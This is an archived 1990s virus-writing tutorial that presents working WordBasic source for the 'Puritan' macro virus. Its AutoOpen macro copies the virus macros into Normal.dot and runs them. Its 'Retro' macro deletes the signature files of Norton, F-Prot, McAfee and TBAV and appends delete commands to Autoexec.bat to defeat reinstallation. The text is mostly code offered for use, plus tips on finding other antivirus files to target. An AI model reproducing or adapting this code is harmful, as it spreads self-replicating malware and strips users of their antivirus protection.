home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
CCTX0297.ZIP
/
MVUPDAT7.ZIP
/
MACROVXU.ZIP
/
NEOWMTUT.ZIP
/
WMTUTRET.TX1
< prev
next >
Wrap
Text File
|
1997-01-19
|
5KB
|
145 lines
RETRO MACRO VIRII
=================
This file shows you how to defeat the most known anti virus products out
there. This technique isn't for using against TSR-AV products. If anyone
knows or has an idea about how to defeat TSR products, e-mail me at
The_Neophyte@hotmail.com
Ok, now for the real code and techniques. I will present parts of code
I first used in my Puritan (1) virus. Because this is the only macro
virus that uses this technique till now.
The actual working of the retro macro is that it deletes the signature
from the most known AV-products, so if the AV-prog is started later you
will get a message like "Virus Signatures corrupt, please reinstall the
program." So the most of the not knowing people out there will reinstall
the program. But if a anti virus proggie for Windows 95 is installed it
will most of the time need a reboot for completing the total install. So
if we put a line in Autoexec.bat such as
"If exist C:\TBAV\TBscan.sig then del C:\TBAV\TBscan.sig"
Ok, got the point? Now for the code:
------Autoopen Macro----------------------------------------------------
Sub MAIN
On Error Goto Z '<This must be familiar
iM = CountMacros(0, 0) ' to you.>
For i = 1 To M
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If
Next i
If Not Y Then
F$ = WindowName$()
S$ = F$ + ":Puritan"
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If
ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'<This runs the macro Retro from the Normal.dot
when the Normal.dot is infected. So it will
normally will be run once every infection.>
Z:
End Sub
------Retro Macro-------------------------------------------------------
Sub MAIN
On Error Goto a '<Build in error handler.>
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
'<VF$ = Virscan.dat file>
If Files$(VF$) = "" Then Goto a '<If it doesn't exists goto a>
SetAttr VF$, 0 '<Set file attributes to none.>
Kill VF$ '<Delete VF$>
a:
On Error Goto c
AB$ = "C:\Autoexec.bat" '<AB$ = Autoexec.bat>
If Files$(AB$) = "" Then Goto c '<If it doesn't exists goto c>
SetAttr AB$, 0 '<set file attributes to none.>
Open AB$ For Append As #1 '<Open AutoExec.bat for appending
Print #1, "@echo off" the line IF exist C:\...\virscan.dat
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1 at the end of the AutoExec.bat>
c: '<Practically the same routine,
On Error Goto d onlt now with other names.>
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d
SetAttr VF$, 0
Kill VF$
d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$
g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$
i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
J:
End Sub
------------------------------------------------------------------------
Quite simple, he?
This retro macro only works with the Win95 AV products, but if you want
a more complete retro technique, that also includes the DOS and WIN 3.11
AV files, just install the AV-proggie and rename a file (Not the .exe).
And run the proggie, see if it still works. And if it doesn't, you got
the right file.
--- Neophyte ---
The_Neophyte@Hotmail.com
